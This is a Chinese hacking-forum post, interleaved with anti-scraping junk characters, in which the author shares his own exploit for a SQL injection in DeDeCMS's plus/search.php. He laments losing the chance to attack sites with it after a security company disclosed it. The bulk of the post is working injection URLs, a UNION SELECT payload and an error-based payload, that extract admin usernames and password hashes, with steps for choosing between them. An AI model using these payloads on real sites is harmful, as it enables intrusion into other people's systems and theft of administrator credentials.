转载不加作者名的没JJ( y# W( a, ]# i ]
2 P! b h5 R% I( D0 H8 j* X哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
9 s) \" C. z9 k7 N
# t' }( [1 n% X既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
, J) |7 e2 d. C0 V) z# P f# M4 @4 J; d
我一般是这样测试的:
5 V! k9 B% t" x
5 k$ `( |- R* e提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
/ y q( ^$ i- p0 g- X# L
2 n! @5 K$ P, a. }. Q转载不加作者名的没JJ
: J* B" i( O# I0 r4 J; a: {+ t, }" s( e% B6 ]
作者:鬼哥
$ z2 F( w. [7 Z( a& Y% M
/ f% t5 h% b- y$ Y+ u
, x" Q- E4 g% a3 j1 V! G0 m6 b+ {+ b8 _2 l$ }
看结果如果提示 @, K- U- f/ y% i: }( ]
7 m5 B, n! A% J5 v( W
Safe Alert: Request Error step 2 !
3 _, E7 u& [2 x3 i: B* C
% M4 ?$ R8 ?$ `* l2 T! ^那么直接用下面的exp
8 `; d( p( g t: ~; r
9 s" K+ i1 @* {0 [+ k: B% [2 A8 Mxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a, O; {8 @. z$ u5 T
; f9 d- |- F! b9 ~, l+ r! }5 y6 e: P% R5 q
看结果如果提示
, [& U) A- f1 a) h% y- j! i! n% i9 P7 i
Safe Alert: Request Error step 1 !
" P, v7 L' g" f, b5 I2 ?; i! d4 f* _5 m$ V0 g2 d' [
那么直接用下面的exp6 B. ~, V2 c( B. @& T0 t
+ J5 K$ @9 v: N+ J+ Z8 L$ ~ L5 J5 V! ?xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a7 ^ j7 i/ M% |3 }8 h( }
3 I8 W5 [' h+ [. w9 d0 I: @) I2 P- W% Y- x; P+ m
如果正常显示证明漏洞不存在了。
9 y& e" }! ?' T0 r
8 I' C+ O# u0 m! X! T5 q; J& u转载不加作者名的没JJ |